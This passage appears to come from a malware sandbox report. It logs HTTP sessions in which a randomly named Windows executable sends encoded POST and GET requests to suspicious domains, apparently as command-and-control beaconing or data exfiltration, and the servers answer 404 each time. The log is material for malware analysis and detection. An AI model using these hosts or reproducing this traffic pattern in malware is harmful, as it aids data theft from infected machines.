m2gpQ=HVlZJtZ2jirmL+F+8TVfHrjnSCqj4d6GXMTRpf0w359yQO+hi4ssoyFvd/yd5N0pdtjoDH3FiXxxSFyGVFzkWBQzehSvXMColkGJoljs8HdjJU3EATeiy1+exGz0G/zoP4goJ3Qc6EwTzI0OxDs17KCydN8yzTlVjYiTDu+Qi5kMAiNVGkkkFqeOwCmQiz5pFOU7ibWJ5hI4nxmkasQmt9rtNTBgP8E9sHZpexc=
Nov 12, 2024 07:57:02.792918921 CET	895	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5AvwUhyl9ckfC0CqiIBUYmwEnjkRU69KL%2BHnYO3WcTzwt5VUrTpwdwmt6FA8LgP7eDeemrJABiuPceWmF8atyJZ7jI%2FBiEZXDfQUs5vVDfJD3I84i3y1mwqEZCBG9bqpAwMfOmigFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a0257a7b4754-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50005	104.21.69.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:04.385241032 CET	1791	OUT	POST /igdb/ HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.gamebaitopzo.fun Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.gamebaitopzo.fun/igdb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 48 56 6c 5a 4a 74 5a 32 6a 69 72 6d 4c 2b 46 2b 38 54 56 66 48 72 6a 6e 53 43 71 6a 34 64 36 47 58 4d 54 52 70 66 30 77 33 35 46 79 51 34 79 68 74 37 30 73 76 79 46 76 52 66 79 4a 35 4e 30 6b 64 74 37 6b 44 48 79 6e 69 52 39 78 41 7a 6d 47 63 52 6e 6b 42 78 51 7a 42 52 53 75 54 4d 43 39 6c 6b 57 4e 6f 6c 7a 73 38 48 64 6a 4a 58 2f 45 48 43 65 69 30 31 2b 5a 6d 32 7a 34 52 76 79 31 50 34 34 34 4a 33 63 71 37 31 51 54 77 73 59 4f 32 78 45 31 6d 61 43 77 63 4e 38 71 7a 54 67 4c 6a 59 75 35 44 72 71 36 69 2b 49 4d 43 48 77 31 62 6b 6b 79 48 4b 61 36 37 6a 65 76 6f 78 74 2b 4b 38 41 6a 6e 4a 4f 78 79 43 38 47 75 78 79 34 61 35 6b 71 7a 2b 2f 2b 42 79 30 34 42 71 4e 52 78 45 35 58 41 6c 31 30 76 56 66 36 67 4c 77 4e 78 61 77 72 45 6e 69 72 56 49 36 49 62 59 6e 6d 6c 6d 69 34 73 49 34 76 74 4c 59 64 49 50 50 62 7a 42 77 6e 76 53 76 69 66 76 63 62 6e 42 6d 64 7a 43 6c 6a 71 59 78 35 44 64 36 59 62 70 36 4a 6e 58 51 51 2f 6e 32 6c 42 52 32 65 2b 57 52 2f 54 52 79 52 4f 67 38 77 65 43 37 55 [TRUNCATED] Data Ascii: m2gpQ=HVlZJtZ2jirmL+F+8TVfHrjnSCqj4d6GXMTRpf0w35FyQ4yht70svyFvRfyJ5N0kdt7kDHyniR9xAzmGcRnkBxQzBRSuTMC9lkWNolzs8HdjJX/EHCei01+Zm2z4Rvy1P444J3cq71QTwsYO2xE1maCwcN8qzTgLjYu5Drq6i+IMCHw1bkkyHKa67jevoxt+K8AjnJOxyC8Guxy4a5kqz+/+By04BqNRxE5XAl10vVf6gLwNxawrEnirVI6IbYnmlmi4sI4vtLYdIPPbzBwnvSvifvcbnBmdzCljqYx5Dd6Ybp6JnXQQ/n2lBR2e+WR/TRyROg8weC7UBSS3ofpodG1G1NYp9uoWPUSujla/RPtHyz2NzZE5MeTIpQ2F86pPuym0e0JRMTPU2oBsY4XrAEtnJ4wLuMw21xgL46cQ6qlRp3lNgHJ24BH5MDGkAcjdKRpqlQ7o84akeSl3UeGOHnzKAFbeQVCMYuOH8ClHXImUFdfApaLR4nMJTSYcRGaM2qHMmTGjXRVBtdZJUupc0kajUZ1TLdVblcEPjMPt78wo7zmMpD5JZZonODSn+cTp/rlmnPSJnCDVfb8Jj3TsO3f3AaPZhZWuY2oSlGLJdlczH158+v2r8WWkCDRXdifSEFOjdwu05UmbqlKNGn10yGc29pJyi63fI+7xmzOXNMQ7BxLun+sOOqKRFk594YHDknm4O3yHK9W22x5bOLKJnxy8R8gufAmOy0HNKMbmYDfafE9kU1VbOQURekILP7PZzvuf94L5Y5CuQk9sbBhrN/YZAavAcde+L3QVKEy1DNHFnHxrkKoUALWNuJLeYSX3AWJOybWp92JNmcLuuyHvcZkzCdzVT5B7DWk1By4ol2dl9YiK4+IhcjGEwwCjIUR7U2q5tqOkwSEIsPDwWCJ7miThHwf05Tbqm3rLsdefbtdwLOUTm7YDJty3Af48lPKOP45Cv0OHyZkiqqVWkeOUihj4M1Nz0tCE/q8kOWvXgWhfZ+ [TRUNCATED]
Nov 12, 2024 07:57:05.391904116 CET	895	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWAqgLLjATnZI1LsJXDbl%2Fm3UbLECmwF5S9lKkJTMqvrNqwerxfG1Qve0hrdH8YIm7Czyuh3KKPKvaZYZ%2BgMw7r%2FoY1Uff9SF8QZAA0oRfv5iFbXcyOWNxmwsUUC%2BQgYIWAcl88wmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a035a8066b5f-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1791&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Nov 12, 2024 07:57:05.391922951 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50006	104.21.69.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:06.928508043 CET	495	OUT	GET /igdb/?m2gpQ=KXN5KYh60A7gMeE/7y9YbJzEbAj8u76Oa7v3ksdE5fh6bb2RqZZNkEsyTM378ew6A9/zEQ377mgRVV6fU1aJNiBJJDK/aOKNmWDYuBDypW14EWrdExPUlDeAnVHwUf34I6IJZnQL8H13&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:57:07.988550901 CET	916	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2FtTcQkO7wrMhB6El%2BO2qsq7gAUj%2Bpc6m9P1lDO4Y8sZEmyksirF4kM5ddsprU5euiCMc%2F260D3wM%2FxOaDrmXDDDPXRrGsP1YrkTdhkd4tYr457u5g9IS%2F5wHXDiyEPYpGoUExVFfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a0459923e857-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2329&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50007	172.67.221.220	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:13.419869900 CET	746	OUT	POST /9tmz/ HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.megaweb8.top Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.megaweb8.top/9tmz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 41 58 64 4e 51 70 41 67 56 71 36 44 66 55 79 63 61 63 52 56 44 53 59 61 54 6e 39 6c 67 57 37 48 77 79 79 48 50 32 4d 79 72 52 44 61 58 2b 61 67 37 44 38 50 64 67 54 39 48 4e 2b 74 6d 2f 6a 36 4a 4f 36 65 6c 59 75 43 36 64 54 30 49 44 73 70 45 2b 70 67 70 47 2b 63 64 6f 4b 70 62 61 79 76 38 67 6a 78 75 5a 6a 2b 75 63 45 31 4f 72 36 46 73 4b 48 66 56 50 38 65 6c 6c 69 74 6a 6a 6f 61 48 6f 74 48 68 34 6e 6a 48 31 47 31 55 54 4c 36 76 4f 35 33 2f 49 46 47 5a 70 71 57 38 38 75 79 52 47 4f 64 4b 73 46 43 39 70 39 30 33 76 7a 61 47 78 73 51 6c 41 54 6e 76 2f 50 44 73 53 69 4c 4e 75 34 50 61 59 49 4b 35 62 4e 34 55 4c 37 51 4c 77 3d 3d Data Ascii: m2gpQ=AXdNQpAgVq6DfUycacRVDSYaTn9lgW7HwyyHP2MyrRDaX+ag7D8PdgT9HN+tm/j6JO6elYuC6dT0IDspE+pgpG+cdoKpbayv8gjxuZj+ucE1Or6FsKHfVP8ellitjjoaHotHh4njH1G1UTL6vO53/IFGZpqW88uyRGOdKsFC9p903vzaGxsQlATnv/PDsSiLNu4PaYIK5bN4UL7QLw==
Nov 12, 2024 07:57:14.272360086 CET	899	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2P3uGwlRMfPcvKOdcd7dUIM1wgS6gqIWNqSAUmTpRAhqZJ96JBGXvW1XzvjR6fSFMKmcL41CAoGb3jklmIt%2FWFvp6XMlMvDJVXUmAhaWQO6b%2BYgGR1dnWAhFYihinNvLpJnT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a06e1867e595-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50008	172.67.221.220	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:15.965437889 CET	766	OUT	POST /9tmz/ HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.megaweb8.top Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.megaweb8.top/9tmz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 41 58 64 4e 51 70 41 67 56 71 36 44 63 30 43 63 5a 37 4e 56 47 79 59 5a 64 48 39 6c 70 32 37 44 77 79 2b 48 50 33 59 69 72 45 7a 61 55 61 57 67 34 43 38 50 61 67 54 39 4d 74 2b 69 34 50 6a 74 4a 4f 6d 57 6c 63 75 43 36 5a 44 30 49 48 67 70 45 50 70 76 72 57 2b 65 56 49 4b 76 45 4b 79 76 38 67 6a 78 75 59 43 70 75 63 4d 31 50 66 47 46 74 76 72 51 4b 2f 38 64 6d 6c 69 74 79 7a 6f 65 48 6f 73 6b 68 36 66 4e 48 7a 43 31 55 51 66 36 75 63 52 30 6f 34 46 63 57 4a 72 65 39 76 33 61 58 6b 53 6e 4e 71 46 2f 33 70 6c 35 79 5a 79 34 63 54 67 38 37 52 72 63 72 39 72 31 37 30 2f 2b 50 76 38 58 58 36 38 72 6d 73 6f 53 5a 5a 61 55 64 43 61 75 4b 73 71 73 45 6b 50 34 38 51 55 61 30 32 78 6d 41 67 30 3d Data Ascii: m2gpQ=AXdNQpAgVq6Dc0CcZ7NVGyYZdH9lp27Dwy+HP3YirEzaUaWg4C8PagT9Mt+i4PjtJOmWlcuC6ZD0IHgpEPpvrW+eVIKvEKyv8gjxuYCpucM1PfGFtvrQK/8dmlityzoeHoskh6fNHzC1UQf6ucR0o4FcWJre9v3aXkSnNqF/3pl5yZy4cTg87Rrcr9r170/+Pv8XX68rmsoSZZaUdCauKsqsEkP48QUa02xmAg0=
Nov 12, 2024 07:57:16.873641968 CET	895	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71tq76pSm7fhLOuJQKugvElN4Ec8eBJ61odqyhMLGYNOVyESbudCSoDHZIiZpHAgtLLdnsLRVZKmhsRYrgnjXh51lsgPDsRcQwJLLq83xY5HYyEdANhgfOGd163pMRcX1QG2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a07e0c8228b7-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1541&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50009	172.67.221.220	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:18.681477070 CET	1779	OUT	POST /9tmz/ HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.megaweb8.top Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.megaweb8.top/9tmz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 41 58 64 4e 51 70 41 67 56 71 36 44 63 30 43 63 5a 37 4e 56 47 79 59 5a 64 48 39 6c 70 32 37 44 77 79 2b 48 50 33 59 69 72 46 6e 61 55 70 65 67 2b 52 6b 50 62 67 54 39 51 64 2f 46 34 50 6a 73 4a 4f 75 53 6c 63 71 30 36 66 66 30 61 53 38 70 4d 62 39 76 78 47 2b 65 5a 6f 4b 71 62 61 79 36 38 67 7a 31 75 5a 75 70 75 63 4d 31 50 65 57 46 6b 61 48 51 5a 76 38 65 6c 6c 69 62 6a 6a 6f 6d 48 75 46 66 68 36 61 34 47 41 4b 31 54 77 50 36 6f 70 4e 30 71 59 46 61 54 4a 72 76 39 76 4c 46 58 6c 2b 42 4e 71 5a 5a 33 75 4a 35 77 4d 72 43 4d 51 46 6d 76 58 7a 2f 6f 73 50 34 78 46 4c 42 4a 4a 67 67 61 64 51 4d 6a 63 30 6d 56 6f 6d 64 58 55 53 70 55 2f 69 62 50 57 6e 52 38 57 64 4b 6b 48 31 42 53 68 6c 5a 72 33 75 2f 6b 2f 55 62 6e 67 65 50 56 4a 37 4d 72 78 57 34 52 54 76 74 57 62 51 4d 67 45 2b 64 32 6b 65 52 63 53 6a 64 74 62 67 6f 6e 6f 6f 48 39 6e 45 55 77 35 61 67 43 4b 59 77 52 6c 70 52 45 70 5a 43 35 34 72 36 32 35 55 6d 4c 59 66 51 37 47 4c 70 46 65 30 72 58 4c 44 66 73 47 4d 68 72 6a 31 51 [TRUNCATED] Data Ascii: m2gpQ=AXdNQpAgVq6Dc0CcZ7NVGyYZdH9lp27Dwy+HP3YirFnaUpeg+RkPbgT9Qd/F4PjsJOuSlcq06ff0aS8pMb9vxG+eZoKqbay68gz1uZupucM1PeWFkaHQZv8ellibjjomHuFfh6a4GAK1TwP6opN0qYFaTJrv9vLFXl+BNqZZ3uJ5wMrCMQFmvXz/osP4xFLBJJggadQMjc0mVomdXUSpU/ibPWnR8WdKkH1BShlZr3u/k/UbngePVJ7MrxW4RTvtWbQMgE+d2keRcSjdtbgonooH9nEUw5agCKYwRlpREpZC54r625UmLYfQ7GLpFe0rXLDfsGMhrj1Qwc/8upH0mZ0iOHBHwF4avJulAK7tshMrdvunKEcJWlik9BZmTVjd90lP/umHCSE3cqig9ptW/mDNUpGhqQhXBmQviLi6U9pBNenPdTLPCp5tMWs9HqSFf4Hzuhty9uucu3AFER42bZ6XbFD5YW8RnO3uGM4ix1EfUri2Qus6qRV1hhQuRxBL/8XyOqANVUYRD+KUYuGMCDmYbyjSgu+PZIyFvRXQeeCbKyWRUj9CRhSE6w0dfpiOWwW7qYmxNPyA0l/BjZCJM/lRtUyf/2jrnlqMflp/KNdxwFdnLBYhKVbuWpoTVCk71FtxlXEdCjSN1LOQWTOrbuKaVE28XN9w3UNHpB+CiOvgvfD9oA47uxmosVXFbKJwjyaTHId36PU4EP8/pqFIYPkRMkiE0Isq3b06uOYkON3tb9fOaqykdbV/oDpLDbUPUnD6DWskXnAf0Lys/OB71SHzfSuH0SnJD96t1XXsirgskS+X4sSEZFRYLIeo5KGIBiF+BRuYkoujLgyVVtrwWnGjxV+XFTIEG/BiaZ0ApsD9SQxo/0e/b1x6Z9SIabrzS064z/rQtJTGs+UmTY8LpzWO+O2ztCm0VLwuGyfOGxYF5YmbeOtwdwwwTiapGKujIBmlgE1UMy0lJXQhDMAWH/tK8HRE41apgeskXFwXzUKAxI [TRUNCATED]
Nov 12, 2024 07:57:19.404994011 CET	902	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aN3AfrySMi9SfigESUPHRUVZOJx2VSz%2Fl0GBPzjUUsy99bCY2ixt2c%2FQVwmp3H7guM9q0l4JjUoTb9O%2BkUV9eH3yr7UuWPrV4Tnn8ry7C8XMeaTdsMjaOIz9NOWLK1xD5DRB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a08e0b9e6b95-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1779&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50010	172.67.221.220	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:21.429227114 CET	491	OUT	GET /9tmz/?KjH=KRIxdVHP60TD8&m2gpQ=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVokaQeP6tHquK0CCjiZSviNcmDdeyv9j5LfcBhXqGhSsmGfBUz+LOACLV HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:57:22.281364918 CET	739	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlCNNqx2CWr1fxc7%2FKGdybx6J0D6vw0vneNqOj2ylQa1wLYWDXS3EqYXHQiXVelTgqsexfrXtijVpq8qd2W9ggzaHyWdcUubamDDrYg29VVNk%2BXjSIXEA5RwK8G8LodI6mTV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a0a00eaccb75-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1334&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 12, 2024 07:57:22.281410933 CET	173	IN	Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50011	91.184.0.200	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
